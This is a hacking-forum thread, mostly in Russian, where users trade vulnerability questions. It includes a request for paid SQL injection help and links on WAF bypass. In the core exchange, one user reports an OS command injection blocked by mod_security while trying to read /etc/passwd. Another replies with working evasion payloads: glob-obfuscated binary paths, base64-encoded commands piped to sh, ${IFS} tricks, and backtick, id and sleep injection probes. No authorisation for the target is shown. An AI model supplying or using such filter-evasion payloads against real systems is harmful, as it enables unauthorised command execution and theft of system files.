Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Gorbachev

    Gorbachev Member

    Joined:
    23 Mar 2017
    Messages:
    182
    Likes Received:
    89
    Reputations:
    40
    Ну вообще, там речь про системные команды, а не php RCE )
     
  2. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    441
    Likes Received:
    80
    Reputations:
    20
    Чем искать NoSQL Injection сканер бурпа умеет? есть расширения под ним?
     
  3. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    188
    Likes Received:
    11
    Reputations:
    0
    Может кто подскажет по данному вопросу?
    PS: В какой ветке можно разместить пост, из разряда помощь со скулей, скину на пиво(
    А то подобных тем не видел в услугах(
     
  4. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    9
    Likes Received:
    5
    Reputations:
    3
    • Фрагментированные SQL иньекции
    • HTTP Parameter Pollution
    https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/PT-devteev-CC-WAF.pdf
    https://www.ptsecurity.com/upload/c...s/Ю.Гольцев_Уязвимости_web_сложные_случаи.pdf
     
    kacergei and BillyBons like this.
  5. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    222
    Likes Received:
    58
    Reputations:
    1
    hi all
    os command injection in post data, mod_sec waf..when try echo test, it works
    but when try uname, ls, pwd, dir waf deletes command, what real advice ?
     
  6. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    489
    Likes Received:
    852
    Reputations:
    311
    Hi, try this:
    Code:
    /b?n/?s /
    /b?n/un?m?
    /?in/e??o "bHMgLWxh" | /?sr/b?n/b??e64 -d | /b?n/?h
    
     
    dmax0fw likes this.
  7. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    222
    Likes Received:
    58
    Reputations:
    1
    @crlf thank you for reply, I tried these variant for reading /etc/passwd, and now also tried your variants, but also WAF cuts functions (((

    request
    response
     
  8. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    489
    Likes Received:
    852
    Reputations:
    311
    It seems that there are some unknown logic on backend, not traditional WAF. Try to fuzz and detect the white/black sequences and conduct the attack vector in accordance with the circumstances. For example:

    Code:
    ;id;
    `id`
    ;sleep 100;
    `sleep 100`
    uname${IFS}-a
    echo$IFS"bHMgLWxh"|base64$IFS-d|sh
    `echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt`
    
    and so on...
    
    Also check this.
     
    man474019 and dmax0fw like this.
  9. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    953
    Likes Received:
    1,235
    Reputations:
    41
    А ты чего ожидал от твоей команды ?
     
Loading...